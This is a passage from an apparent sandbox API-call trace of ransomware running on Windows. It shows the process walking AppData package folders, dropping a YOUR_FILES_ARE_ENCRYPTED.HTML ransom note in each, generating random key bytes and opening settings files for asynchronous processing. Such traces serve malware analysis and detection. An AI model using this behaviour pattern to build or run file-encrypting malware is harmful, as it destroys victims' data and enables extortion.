pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 222 [0118.523] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0118.523] lstrlenW (lpString=".LOG2") returned 5 [0118.524] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0118.526] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x559e7456, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315f7c8, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0118.526] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0118.526] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 227 [0118.526] GetProcessHeap () returned 0x600000 [0118.526] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\microsoft.windows.cloudexperiencehost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.559] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.560] CloseHandle (hObject=0x32c) returned 1 [0118.560] GetProcessHeap () returned 0x600000 [0118.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.561] GetProcessHeap () returned 0x600000 [0118.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.561] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x559e7456, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x559e7456, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x559e7456, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0118.561] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.561] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 211 [0118.561] GetProcessHeap () returned 0x600000 [0118.561] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.CloudExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\microsoft.windows.cloudexperiencehost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.569] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.570] CloseHandle (hObject=0x324) returned 1 [0118.571] GetProcessHeap () returned 0x600000 [0118.571] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.571] GetProcessHeap () returned 0x600000 [0118.571] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.572] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5581d776, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5581d776, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5581d776, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0118.572] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.572] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\RoamingState") returned 113 [0118.572] GetProcessHeap () returned 0x600000 [0118.572] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.573] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\RoamingState" [0118.573] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\RoamingState\\*" [0118.573] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5581d776, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5581d776, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5581d776, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626978 [0118.574] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5581d776, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5581d776, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5581d776, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0118.574] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5581d776, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5581d776, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5581d776, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0118.574] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0118.574] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0118.574] GetProcessHeap () returned 0x600000 [0118.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.575] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.576] CloseHandle (hObject=0x324) returned 1 [0118.576] GetProcessHeap () returned 0x600000 [0118.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.576] GetProcessHeap () returned 0x600000 [0118.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.577] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0118.577] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.577] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings") returned 109 [0118.577] GetProcessHeap () returned 0x600000 [0118.577] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.578] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings" [0118.578] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\*" [0118.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x92cc2437, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0118.657] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x92cc2437, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0118.657] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0118.657] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.657] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\roaming.lock") returned 122 [0118.657] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0118.657] lstrlenW (lpString=".lock") returned 5 [0118.657] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0118.657] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x930098c6, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x930098c6, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0118.657] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.657] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat") returned 122 [0118.657] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0118.657] lstrlenW (lpString=".dat") returned 4 [0118.657] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0118.657] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0118.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0118.658] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0118.658] GetProcessHeap () returned 0x600000 [0118.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0118.661] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="41") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A8") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="53") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="4F") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="2D") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="73") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="C0") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="41") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="81") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="CF") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="F1") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="B4") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="33") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="E6") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="DA") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="4E") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="76") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="57") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="36") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="0B") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="C7") returned 2 [0118.661] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="92") returned 2 [0118.661] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="FA") returned 2 [0118.662] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="9D") returned 2 [0118.662] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="32") returned 2 [0118.662] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="C9") returned 2 [0118.662] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="73") returned 2 [0118.662] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="8E") returned 2 [0118.662] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="E9") returned 2 [0118.662] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="FF") returned 2 [0118.662] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="B6") returned 2 [0118.662] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="0D") returned 2 [0118.662] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat" [0118.662] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.662] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0118.662] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x92c4fc93, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x92c4fc93, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x92c4fc93, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0118.662] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.662] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 127 [0118.663] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0118.663] lstrlenW (lpString=".LOG1") returned 5 [0118.663] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0118.663] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x92c4fc93, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x92c4fc93, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x92c4fc93, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0118.663] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.663] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 127 [0118.663] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0118.663] lstrlenW (lpString=".LOG2") returned 5 [0118.663] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0118.663] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x92c4fc93, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x92c4fc93, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x92c4fc93, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0118.663] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0118.663] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 139 [0118.663] GetProcessHeap () returned 0x600000 [0118.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cloudexperiencehost_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.664] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.665] CloseHandle (hObject=0x324) returned 1 [0118.665] GetProcessHeap () returned 0x600000 [0118.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.665] GetProcessHeap () returned 0x600000 [0118.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.665] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x558439bd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x558439bd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x558439bd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0118.666] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.666] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: 